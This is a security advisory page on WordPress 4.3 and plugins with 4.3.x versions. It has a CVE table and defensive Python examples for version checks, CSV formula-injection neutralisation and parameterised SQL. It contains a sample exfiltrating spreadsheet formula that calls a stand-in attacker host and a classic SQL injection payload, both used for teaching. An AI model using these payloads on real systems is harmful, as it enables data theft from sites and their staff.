WordPress 4.3 is an outdated release. The scan behind this page associates 144 known security vulnerabilities with it, and the table further down shows three entries rated CRITICAL. Vulnerabilities of the classes listed here let an attacker execute code on the server, read or alter the database, and take full control of a site. If you are still running WordPress 4.3, the priority is to confirm the core version and the installed plugin versions, then upgrade.
The security landscape has changed considerably since WordPress 4.3 shipped, and outdated software is the first thing automated attacks look for. The scanner still sees 27 websites on this version, so you are not alone, but that is no reason to delay. This guide explains how to tell whether you are exposed and what to do about it.
WordPress 4.3 is a major version of WordPress released in 2015. WordPress is a content management system (CMS) that powers nearly 43% of all websites on the internet. It allows users without coding knowledge to create, publish, and manage website content through an intuitive dashboard interface. WordPress 4.3 specifically introduced improvements to media management, customization options, and overall user experience.
However, WordPress 4.3 was released more than a decade ago, and the threat landscape has moved on since then. WordPress issues security releases to patch newly discovered vulnerabilities; an installation that is never updated keeps running with holes that are public, documented, and scanned for automatically. It is the equivalent of leaving the front door unlocked while announcing that you are away: attackers know exactly where to look.
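The first step is knowing what is actually installed. The following script, added here as an example and not part of SiteRecipe's scanner or of WordPress itself, reads the version WordPress records in wp-includes/version.php and the Version: header every plugin declares in its main file, then compares them against a map of "fixed in" versions. The site tree it scans is constructed in a temporary directory; the plugin directory slugs and the thresholds in SAMPLE_FIXED_IN are assumptions mirrored from three rows in the table below, not a vulnerability feed.

```python
"""Inventory WordPress core and plugin versions from a site's files.

Added example for this page, not SiteRecipe's scanner or WordPress code.
It reads the $wp_version assignment in wp-includes/version.php and the
"Version:" header of each plugin's main file, then compares them against a
map of minimum fixed versions. The sample site tree is constructed, and
the fixed-in values are illustrative (the plugin directory slugs are
assumed; take real thresholds from NVD, not from this map).
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

WP_VERSION_RE = re.compile(r"\$wp_version\s*=\s*'([^']+)'")
PLUGIN_VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*(\S+)", re.MULTILINE | re.IGNORECASE)

# Constructed thresholds: "fixed in" versions mirrored from three rows on this page
# (WordPress before 4.3.1, WPtouch before 4.3.45, wp-database-backup before 4.3.3).
SAMPLE_FIXED_IN = {
    "wordpress": "4.3.1",
    "wptouch": "4.3.45",
    "wp-database-backup": "4.3.3",
}


def version_tuple(version: str) -> Tuple[int, ...]:
    """Turn '4.3.1-beta2' into (4, 3, 1) so dotted versions compare numerically."""
    numeric = re.match(r"[0-9.]+", version)
    if not numeric:
        return (0,)
    return tuple(int(part) for part in numeric.group(0).split(".") if part)


def core_version(site_root: Path) -> Optional[str]:
    """Return the core version declared in wp-includes/version.php, if present."""
    version_file = site_root / "wp-includes" / "version.php"
    if not version_file.is_file():
        return None
    match = WP_VERSION_RE.search(version_file.read_text(encoding="utf-8", errors="replace"))
    return match.group(1) if match else None


def plugin_versions(site_root: Path) -> Dict[str, str]:
    """Map each plugin directory slug to the Version: header of its first PHP file that has one."""
    found: Dict[str, str] = {}
    plugins_dir = site_root / "wp-content" / "plugins"
    if not plugins_dir.is_dir():
        return found
    for plugin_dir in sorted(p for p in plugins_dir.iterdir() if p.is_dir()):
        for php_file in sorted(plugin_dir.glob("*.php")):
            match = PLUGIN_VERSION_RE.search(php_file.read_text(encoding="utf-8", errors="replace"))
            if match:
                found[plugin_dir.name] = match.group(1)
                break
    return found


def outdated(site_root: Path, fixed_in: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (component, installed, fixed_in) for every installed component below its fix version."""
    installed: Dict[str, Optional[str]] = {"wordpress": core_version(site_root)}
    installed.update(plugin_versions(site_root))
    report = []
    for component, minimum in fixed_in.items():
        current = installed.get(component)
        if current is None:
            continue  # not installed, so nothing to patch here
        if version_tuple(current) < version_tuple(minimum):
            report.append((component, current, minimum))
    return report


def build_sample_site() -> Path:
    """Write a constructed, minimal WordPress tree to a temp dir (test data, not a real site)."""
    root = Path(tempfile.mkdtemp(prefix="wp-sample-"))
    (root / "wp-includes").mkdir()
    (root / "wp-includes" / "version.php").write_text("<?php\n$wp_version = '4.3';\n")
    for slug, version in {"wptouch": "4.3.40", "wp-database-backup": "4.3.3"}.items():
        plugin_dir = root / "wp-content" / "plugins" / slug
        plugin_dir.mkdir(parents=True)
        (plugin_dir / f"{slug}.php").write_text(f"<?php\n/*\nPlugin Name: {slug}\nVersion: {version}\n*/\n")
    return root


def sample_report() -> List[Tuple[str, str, str]]:
    """Run the check against the constructed site; wordpress and wptouch are below their fix versions."""
    return outdated(build_sample_site(), SAMPLE_FIXED_IN)


if __name__ == "__main__":
    for component, current, minimum in sample_report():
        print(f"{component}: installed {current}, fixed in {minimum}")
```

Run it against a copy of the document root (or over SSH with the path adjusted) rather than through the site's web interface: neither check depends on the site being reachable, and the same Version: regex applies to a theme's style.css under wp-content/themes. The comparison is a plain numeric tuple, which is what the "before X" wording in the table implies; it drops pre-release suffixes rather than ordering them.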
The scan reports 144 CVEs. Six of the highest-impact entries are summarised below in plain language; they appear here without CVE identifiers, so match each against its NVD record before acting on it. The full table follows.
The OpenHook plugin lets authenticated users with basic accounts execute arbitrary PHP on the server. The code path is reachable only when the plugin's [php] shortcode option is enabled in its settings, so check that option first: if it is off the issue cannot be triggered; if it is on, those users can run code as the web server user.
Impact: Complete takeover of the site, theft or modification of data, and use of the server to attack other targets.
The Email Subscribers & Newsletters plugin contains an SQL injection flaw: attacker-supplied input reaches a database query without proper escaping, so crafted values let an attacker read data the query was never meant to return, typically without obvious traces in the application's own logs.
Impact: Theft of the subscriber list, customer records, or any other data stored in the WordPress database.
The Infographic Maker plugin does not validate user input before using it in a database query, and the affected request does not require authentication.
Impact: Unauthenticated users could read or manipulate the site's database, potentially exposing everything stored in it.
The WordPress Classifieds plugin fails to validate user input when processing certain requests, giving unauthenticated as well as logged-in users a route to SQL injection.
Impact: Attackers could read, modify, or delete classified listings and other database records.
The Contact Form Plugin does not neutralise submitted values when exporting form responses as CSV. A submission that begins with a formula character such as = is written into the file verbatim (CSV or formula injection).
Impact: When the exported file is opened in Excel or another spreadsheet, the injected formula can run on the computer of whoever opens it, leaking data from the sheet or prompting further actions. The risk is to the staff member opening the export, not to the web server.
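The export described above can be made safe at the point where cells are written. The following is an added example, not code from the Contact Form plugin or from WordPress: it writes a set of constructed form responses to CSV twice, once verbatim (the vulnerable behaviour) and once with formula-looking cells prefixed so a spreadsheet displays them as text, and it includes a check that parses an export back to find cells a spreadsheet would evaluate.

```python
"""Neutralise spreadsheet formula injection in a CSV export.

Added example for this page, not code from the Contact Form plugin: it
reproduces the bug class described above (a submitted value beginning with
'=' is written into the CSV verbatim and a spreadsheet evaluates it when
the file is opened) and shows the export that prefixes such cells so they
display as text. The sample form responses are constructed.
"""
import csv
import io
from typing import Iterable, List, Sequence

# Leading characters that Excel, LibreOffice and Google Sheets treat as the start of a
# formula. Tab and carriage return are included because a cell that starts with one
# can still push the following text into an evaluated position.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def looks_numeric(cell: str) -> bool:
    """'-12.5' or '+7' is a number, not a formula, and must not be altered."""
    return cell.lstrip("+-").replace(".", "", 1).isdigit()


def is_formula_like(cell: str) -> bool:
    return cell.startswith(FORMULA_TRIGGERS) and not looks_numeric(cell)


def neutralise_cell(cell):
    """Prefix a formula-looking string with a single quote; leave everything else as-is."""
    if isinstance(cell, str) and is_formula_like(cell):
        return "'" + cell
    return cell


def export_responses(rows: Iterable[Sequence], neutralise: bool = True) -> str:
    """Serialise responses to CSV. neutralise=False reproduces the vulnerable export."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["name", "email", "message"])
    for row in rows:
        writer.writerow([neutralise_cell(c) if neutralise else c for c in row])
    return buf.getvalue()


def formula_cells(csv_text: str) -> List[str]:
    """Parse an export back and list the cells a spreadsheet would evaluate (an export check)."""
    return [cell for row in csv.reader(io.StringIO(csv_text)) for cell in row if is_formula_like(cell)]


# Constructed submissions: one benign, one that pulls a neighbouring cell into a
# hyperlink, one negative number that must survive, one phone number with a leading '+'.
SAMPLE_RESPONSES = [
    ("Alice", "alice@example.com", "Please call me back"),
    ("Mallory", "mallory@example.com", '=HYPERLINK("https://attacker.example/?"&A1,"Open")'),
    ("Bob", "bob@example.com", "-12.5"),
    ("Eve", "eve@example.com", "+1 555 0100"),
]


if __name__ == "__main__":
    print("vulnerable export evaluates:", formula_cells(export_responses(SAMPLE_RESPONSES, neutralise=False)))
    print("neutralised export evaluates:", formula_cells(export_responses(SAMPLE_RESPONSES)))
```

The single-quote prefix is the OWASP recommendation and keeps the value readable; the numeric exemption matters because a sanitiser that mangles "-12.5" gets switched off by the next developer who notices. Opening the file in a spreadsheet is the only real test of a given cell, so treat formula_cells as a unit test for the exporter, not as a guarantee.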
The Gift Cards plugin exposes a feature that passes a request parameter into a database query without sanitisation, and the request does not require authentication.
Impact: Theft of gift card and customer data, or wider control over the site's database.
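Four of the six summaries above (Email Subscribers & Newsletters, Infographic Maker, WordPress Classifieds, Gift Cards) are the same bug class. The following is an added example, not code from any of those plugins or from WordPress: it reproduces the pattern against an in-memory SQLite table of constructed gift-card records, sends a classic always-true payload through a string-built query and through a bound-parameter query, and returns both results so the difference is visible. The schema, the rows and the 'code' parameter name are assumptions.

```python
"""String-built SQL versus a parameterised query, on constructed data.

Added example for this page, not code from any plugin listed here. The SQL
injection entries above share one root cause: a request parameter is spliced
into the query text. This reproduces that pattern against an in-memory SQLite
table of gift-card records and shows the bound-parameter form that closes it.
The schema, rows and the 'code' parameter name are constructed assumptions.
"""
import sqlite3
from typing import Dict, List, Tuple

SAMPLE_ROWS = [  # constructed records; nothing here comes from a real site
    ("GC-0001", 50, "alice@example.com"),
    ("GC-0002", 25, "bob@example.com"),
    ("GC-0003", 100, "carol@example.com"),
]

# An attacker-controlled value for the lookup parameter: it closes the quoted
# literal and appends an always-true condition.
PAYLOAD = "' OR '1'='1"


def connect() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gift_cards (code TEXT PRIMARY KEY, balance INTEGER, owner_email TEXT)")
    conn.executemany("INSERT INTO gift_cards VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, code: str) -> List[Tuple]:
    """Mirrors the bug class: the parameter becomes part of the SQL text."""
    sql = "SELECT code, balance, owner_email FROM gift_cards WHERE code = '" + code + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, code: str) -> List[Tuple]:
    """The value travels as a bound parameter; the SQL text never changes."""
    return conn.execute(
        "SELECT code, balance, owner_email FROM gift_cards WHERE code = ?", (code,)
    ).fetchall()


def demo() -> Dict[str, List[Tuple]]:
    """Run both lookups with the payload and one legitimate value."""
    conn = connect()
    return {
        "vulnerable_with_payload": lookup_vulnerable(conn, PAYLOAD),  # every row comes back
        "safe_with_payload": lookup_safe(conn, PAYLOAD),  # no row has that literal code
        "safe_legitimate": lookup_safe(conn, "GC-0002"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {len(rows)} row(s) {rows}")
```

In a WordPress plugin the bound-parameter form is $wpdb->prepare() with %s or %d placeholders, and the same rule applies to the integer 'edit_id' style parameters in the table: casting to int closes that one case, prepare() closes all of them. What makes the Infographic Maker, Classifieds and Gift Cards entries especially dangerous is that the vulnerable request needs no login, so a payload like the one above can be sent by anyone who can reach the site. Note that sqlite3 refuses stacked statements in execute(), which hides the "; DROP TABLE" variant; MySQL drivers used by WordPress differ, so do not read the single-row result here as a limit on what injection can do.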
How to read the table below. It lists every entry the scan associated with the version string "4.3", and most rows are advisories for plugins or themes whose own version is 4.3.x (for example "WPtouch before 4.3.45" or "wp-database-backup before 4.3.3"). Those rows matter only if that plugin is installed at an affected version, whatever WordPress core version the site runs; conversely, a site on WordPress 4.3 is not exposed to them unless the plugin is present. The rows that concern WordPress core itself are the ones that name WordPress directly: CVE-2015-5714, CVE-2015-5715 and CVE-2015-7989 (fixed in 4.3.1), and the later entries that describe "affected versions of WordPress" (CVE-2020-11025 through CVE-2020-11030, CVE-2020-4046 through CVE-2020-4050, CVE-2023-39999, CVE-2024-31210, CVE-2024-32111), whose exact affected ranges should be confirmed on NVD. One row, CVE-2013-1636, appears to match only on its CVSS score of 4.3 and is unrelated to either WordPress 4.3 or a 4.3 plugin version. "Score" is the CVSS base score NVD publishes; "Published" is the NVD publication date, which can be years after the fix shipped (the 2016 CVEs were published in 2019).
| CVE ID | Severity | Score | Published | Description |
|---|---|---|---|---|
| CVE-2025-11693 | CRITICAL | 9.8 | 2025-12-13 | The Export WP Page to Static HTML & PDF plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.4 through publicly exposed c… |
| CVE-2025-32202 | CRITICAL | 9.1 | 2025-04-10 | Unrestricted Upload of File with Dangerous Type vulnerability in Brian Batt - elearningfreak.com Insert or Embed Articulate Content into WordPress insert-or-embed-articulate-conte… |
| CVE-2026-4365 | CRITICAL | 9.1 | 2026-04-14 | The LearnPress plugin for WordPress is vulnerable to unauthorized data deletion due to a missing capability check on the `delete_question_answer()` function in all versions up to,… |
| CVE-2016-10874 | HIGH | 8.8 | 2019-08-12 | The wp-database-backup plugin before 4.3.3 for WordPress has CSRF. |
| CVE-2016-10876 | HIGH | 8.8 | 2019-08-12 | The wp-database-backup plugin before 4.3.1 for WordPress has CSRF. |
| CVE-2020-10568 | HIGH | 8.8 | 2020-03-14 | The sitepress-multilingual-cms (WPML) plugin before 4.3.7-b.2 for WordPress has CSRF due to a loose comparison. This leads to remote code execution in includes/class-wp-installer.… |
| CVE-2022-3417 | HIGH | 8.8 | 2023-01-09 | The WPtouch WordPress plugin before 4.3.45 unserialises the content of an imported settings file, which could lead to PHP object injections issues when an user import (intentional… |
| CVE-2024-5034 | HIGH | 8.8 | 2024-07-13 | The SULly WordPress plugin before 4.3.1 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks |
| CVE-2024-5630 | HIGH | 8.8 | 2024-07-15 | The Insert or Embed Articulate Content into WordPress plugin before 4.3000000024 does not prevent authors from uploading arbitrary files to the site, which may allow them to uploa… |
| CVE-2024-9195 | HIGH | 8.8 | 2025-02-28 | The WHMPress - WHMCS Client Area plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on… |
| CVE-2026-5127 | HIGH | 8.8 | 2026-05-08 | The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to Deserialization of Untrusted Data in … |
| CVE-2020-11026 | HIGH | 8.7 | 2020-04-30 | In affected versions of WordPress, files with a specially crafted name when uploaded to the Media section can lead to script execution upon accessing the file. This requires an au… |
| CVE-2024-4611 | HIGH | 8.1 | 2024-05-29 | The AppPresser plugin for WordPress is vulnerable to improper missing encryption exception handling on the 'decrypt_value' and on the 'doCookieAuth' functions in all versions up t… |
| CVE-2023-6696 | HIGH | 8.1 | 2024-06-15 | The Popup Builder – Create highly converting, mobile friendly marketing popups. plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capabil… |
| CVE-2025-9991 | HIGH | 8.1 | 2025-09-30 | The Tiny Bootstrap Elements Light plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.3.34 via the 'language' parameter. This makes … |
| CVE-2024-31210 | HIGH | 7.6 | 2024-04-04 | WordPress is an open publishing platform for the Web. It's possible for a file of a type other than a zip file to be submitted as a new plugin by an administrative user on the Plu… |
| CVE-2019-11807 | HIGH | 7.5 | 2019-05-06 | The WooCommerce Checkout Manager plugin before 4.3 for WordPress allows media deletion via the wp-admin/admin-ajax.php?action=update_attachment_wccm wccm_default_keys_load paramet… |
| CVE-2023-6827 | HIGH | 7.5 | 2023-12-15 | The Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'ajaxUploadFonts' function in versions up to… |
| CVE-2024-13490 | HIGH | 7.5 | 2025-02-12 | The LTL Freight Quotes – XPO Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, … |
| CVE-2024-13491 | HIGH | 7.5 | 2025-02-19 | The Small Package Quotes – For Customers of FedEx plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, an… |
| CVE-2021-25023 | HIGH | 7.2 | 2022-01-03 | The Speed Booster Pack ⚡ PageSpeed Optimization Suite WordPress plugin before 4.3.3.1 does not escape the sbp_convert_table_name parameter before using it in a SQL statement to co… |
| CVE-2022-3416 | HIGH | 7.2 | 2023-01-09 | The WPtouch WordPress plugin before 4.3.45 does not properly validate images to be uploaded, allowing high privilege users such as admin to upload arbitrary files on the server ev… |
| CVE-2023-2298 | HIGH | 7.2 | 2023-06-03 | The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'business_id' parameter in versions up to… |
| CVE-2023-4719 | HIGH | 7.2 | 2023-09-06 | The Simple Membership plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `list_type` parameter in versions up to, and including, 4.3.5 due to insufficien… |
| CVE-2026-1937 | HIGH | 7.2 | 2026-02-18 | The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capabilit… |
| CVE-2022-4501 | HIGH | 7.1 | 2022-12-14 | The Mega Addons plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the vc_saving_data function in versions up to, and including, 4.3.0… |
| CVE-2024-5151 | HIGH | 7.1 | 2024-07-13 | The SULly WordPress plugin before 4.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Script… |
| CVE-2023-7291 | HIGH | 7.1 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the create_mollie_accoun… |
| CVE-2023-7294 | HIGH | 7.1 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the create_mollie_profile f… |
| CVE-2020-4047 | MEDIUM | 6.8 | 2020-06-12 | In affected versions of WordPress, authenticated users with upload permissions (like authors) are able to inject JavaScript into some media file attachment pages in a certain way.… |
| CVE-2021-4451 | MEDIUM | 6.6 | 2024-10-16 | The NinjaFirewall plugin for WordPress is vulnerable to Authenticated PHAR Deserialization in versions up to, and including, 4.3.3. This allows authenticated attackers to perform … |
| CVE-2021-25072 | MEDIUM | 6.5 | 2022-02-01 | The NextScripts: Social Networks Auto-Poster WordPress plugin before 4.3.25 does not have CSRF check in place when deleting items, allowing attacker to make a logged in admin dele… |
| CVE-2022-0914 | MEDIUM | 6.5 | 2022-04-11 | The Export All URLs WordPress plugin before 4.3 does not have CSRF in place when exporting data, which could allow attackers to make a logged in admin export all posts and pages (… |
| CVE-2023-0335 | MEDIUM | 6.5 | 2023-03-27 | The WP Shamsi WordPress plugin through 4.3.3 has CSRF and broken access control vulnerabilities which leads user with role as low as subscriber delete attachment. |
| CVE-2023-50824 | MEDIUM | 6.5 | 2023-12-21 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brian Batt Insert or Embed Articulate Content into WordPress allows Stored XS… |
| CVE-2025-14980 | MEDIUM | 6.5 | 2026-01-09 | The BetterDocs plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.3 via the scripts() function. This makes it possible … |
| CVE-2020-11030 | MEDIUM | 6.4 | 2020-04-30 | In affected versions of WordPress, a special payload can be crafted that can lead to scripts getting executed within the search block of the block editor. This requires an authent… |
| CVE-2023-6801 | MEDIUM | 6.4 | 2024-01-06 | The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settin… |
| CVE-2024-0254 | MEDIUM | 6.4 | 2024-02-05 | The (Simply) Guest Author Name plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's post meta in all versions up to, and including, 4.34 due to insuf… |
| CVE-2023-6877 | MEDIUM | 6.4 | 2024-04-07 | The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's… |
| CVE-2024-5945 | MEDIUM | 6.4 | 2024-06-21 | The WP SVG Images plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘type’ parameter in all versions up to, and including, 4.3 due to insufficient input sa… |
| CVE-2025-3782 | MEDIUM | 6.4 | 2025-05-06 | The Cision Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ parameter in all versions up to, and including, 4.3.0 due to insufficient input san… |
| CVE-2025-4577 | MEDIUM | 6.4 | 2025-06-10 | The Smash Balloon Social Post Feed – Simple Social Feeds for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-color attribute in all versio… |
| CVE-2025-5233 | MEDIUM | 6.4 | 2025-06-13 | The Color Palette plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘hex’ parameter in all versions up to, and including, 4.3.2 due to insufficient input s… |
| CVE-2025-14387 | MEDIUM | 6.4 | 2025-12-15 | The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.3.1 due to insufficient input sanit… |
| CVE-2026-2257 | MEDIUM | 6.4 | 2026-03-13 | The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2 due to missing validation on a user controlled key … |
| CVE-2026-4333 | MEDIUM | 6.4 | 2026-04-08 | The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'skin' attribute of the learn_press_courses shortcode in all versio… |
| CVE-2026-3875 | MEDIUM | 6.4 | 2026-04-16 | The BetterDocs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'betterdocs_feedback_form' shortcode in all versions up to, and including, 4.3.8. This is … |
| CVE-2026-7795 | MEDIUM | 6.4 | 2026-06-06 | The Click to Chat – WA Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [chat] shortcode 'num' parameter in all versions up to, and including, 4.38… |
| CVE-2025-7825 | MEDIUM | 6.3 | 2025-10-03 | The Schema Plugin For Divi, Gutenberg & Shortcodes plugin for WordPress is vulnerable to Object Instantiation in all versions up to, and including, 4.3.2 via deserialization of un… |
| CVE-2015-5714 | MEDIUM | 6.1 | 2016-05-22 | Cross-site scripting (XSS) vulnerability in WordPress before 4.3.1 allows remote attackers to inject arbitrary web script or HTML by leveraging the mishandling of unclosed HTML el… |
| CVE-2017-12948 | MEDIUM | 6.1 | 2017-08-18 | Core\Admin\PFTemplater.php in the PressForward plugin 4.3.0 and earlier for WordPress has XSS in the PATH_INFO to wp-admin/admin.php, related to PHP_SELF. |
| CVE-2018-9844 | MEDIUM | 6.1 | 2018-04-07 | The Iptanus WordPress File Upload plugin before 4.3.4 for WordPress mishandles Settings attributes, leading to XSS. |
| CVE-2016-10873 | MEDIUM | 6.1 | 2019-08-12 | The wp-database-backup plugin before 4.3.3 for WordPress has XSS. |
| CVE-2016-10875 | MEDIUM | 6.1 | 2019-08-12 | The wp-database-backup plugin before 4.3.1 for WordPress has XSS. |
| CVE-2016-10896 | MEDIUM | 6.1 | 2019-08-21 | The seo-redirection plugin before 4.3 for WordPress has stored XSS. |
| CVE-2020-11027 | MEDIUM | 6.1 | 2020-04-30 | In affected versions of WordPress, a password reset link emailed to a user does not expire upon changing the user password. Access would be needed to the email account of the user… |
| CVE-2021-38356 | MEDIUM | 6.1 | 2021-11-01 | The NextScripts: Social Networks Auto-Poster <= 4.3.20 WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the $_REQUEST['page'] parameter which is echoed out on … |
| CVE-2021-24975 | MEDIUM | 6.1 | 2022-02-01 | The NextScripts: Social Networks Auto-Poster WordPress plugin before 4.3.24 does not sanitise and escape logged requests before outputting them in the related admin dashboard, lea… |
| CVE-2023-0448 | MEDIUM | 6.1 | 2023-01-26 | The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability. |
| CVE-2023-6882 | MEDIUM | 6.1 | 2024-01-11 | The Simple Membership plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘environment_mode’ parameter in all versions up to, and including, 4.3.8 due to … |
| CVE-2022-1617 | MEDIUM | 6.1 | 2024-01-16 | The WP-Invoice WordPress plugin through 4.3.1 does not have CSRF check in place when updating its settings, and is lacking sanitisation as well as escaping in some of them, allowi… |
| CVE-2024-8872 | MEDIUM | 6.1 | 2024-09-26 | The Store Hours for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all… |
| CVE-2024-13839 | MEDIUM | 6.1 | 2025-03-05 | The Staff Directory Plugin: Company Directory plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on … |
| CVE-2024-5033 | MEDIUM | 5.9 | 2024-07-13 | The SULly WordPress plugin before 4.3.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in adm… |
| CVE-2020-11025 | MEDIUM | 5.8 | 2020-04-30 | In affected versions of WordPress, a cross-site scripting (XSS) vulnerability in the navigation section of Customizer allows JavaScript code to be executed. Exploitation requires … |
| CVE-2020-11028 | MEDIUM | 5.8 | 2020-04-30 | In affected versions of WordPress, some private posts, which were previously public, can result in unauthenticated disclosure under a specific set of conditions. This has been pat… |
| CVE-2020-11029 | MEDIUM | 5.8 | 2020-04-30 | In affected versions of WordPress, a vulnerability in the stats() method of class-wp-object-cache.php can be exploited to execute cross-site scripting (XSS) attacks. This has been… |
| CVE-2020-4048 | MEDIUM | 5.7 | 2020-06-12 | In affected versions of WordPress, due to an issue in wp_validate_redirect() and URL sanitization, an arbitrary external link can be crafted leading to unintended/open redirect wh… |
| CVE-2023-24410 | MEDIUM | 5.5 | 2023-10-31 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Contact Form - WPManageNinja LLC Contact Form Plugin – Fastest Contact Form B… |
| CVE-2015-7989 | MEDIUM | 5.4 | 2016-05-22 | Cross-site scripting (XSS) vulnerability in the user list table in WordPress before 4.3.1 allows remote authenticated users to inject arbitrary web script or HTML via a crafted e-… |
| CVE-2018-9172 | MEDIUM | 5.4 | 2018-04-01 | The Iptanus WordPress File Upload plugin before 4.3.3 for WordPress mishandles shortcode attributes. |
| CVE-2020-4046 | MEDIUM | 5.4 | 2020-06-12 | In affected versions of WordPress, users with low privileges (like contributors and authors) can use the embed block in a certain way to inject unfiltered HTML in the block editor… |
| CVE-2021-24366 | MEDIUM | 5.4 | 2021-06-21 | The Admin Columns WordPress plugin before 4.3 and Admin Columns Pro WordPress plugin before 5.5.1 do not sanitise and escape its Label settings, which could allow high privilege u… |
| CVE-2021-24365 | MEDIUM | 5.4 | 2021-07-12 | The Admin Columns WordPress plugin Free before 4.3.2 and Pro before 5.5.2 allowed to configure individual columns for tables. Each column had a type. The type "Custom Field" allow… |
| CVE-2021-24670 | MEDIUM | 5.4 | 2021-09-27 | The CoolClock WordPress plugin before 4.3.5 does not escape some shortcode attributes, allowing users with a role as low as Contributor to perform Stored Cross-Site Scripting attac… |
| CVE-2022-4478 | MEDIUM | 5.4 | 2023-01-16 | The Font Awesome WordPress plugin before 4.3.2 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with… |
| CVE-2023-0402 | MEDIUM | 5.4 | 2023-01-19 | The Social Warfare plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on several AJAX actions in versions up to, and including, 4.3.0. Th… |
| CVE-2023-0403 | MEDIUM | 5.4 | 2023-01-19 | The Social Warfare plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.3.1. This is due to missing or incorrect nonce validation o… |
| CVE-2023-0546 | MEDIUM | 5.4 | 2023-04-10 | The Contact Form Plugin WordPress plugin before 4.3.25 does not properly sanitize and escape the srcdoc attribute in iframes in its custom HTML field type, allowing a logged in u… |
| CVE-2023-0268 | MEDIUM | 5.4 | 2023-05-08 | The Mega Addons For WPBakery Page Builder WordPress plugin before 4.3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post wh… |
| CVE-2023-2414 | MEDIUM | 5.4 | 2023-06-09 | The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vc… |
| CVE-2023-5620 | MEDIUM | 5.4 | 2023-11-27 | The Web Push Notifications WordPress plugin before 4.35.0 does not prevent visitors on the site from changing some of the plugin options, some of which may be used to conduct Stor… |
| CVE-2023-6798 | MEDIUM | 5.4 | 2024-01-06 | The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized settings update due to a missin… |
| CVE-2024-0757 | MEDIUM | 5.4 | 2024-06-04 | The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 is not properly filtering which file extensions are allowed to be imported on the server, allowin… |
| CVE-2024-0756 | MEDIUM | 5.4 | 2024-06-04 | The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 lacks validation of URLs when adding iframes, allowing attackers to inject an iFrame in the page … |
| CVE-2023-7287 | MEDIUM | 5.4 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized subscription cancellation due to a missing capability check on the pt_cancel_subsc… |
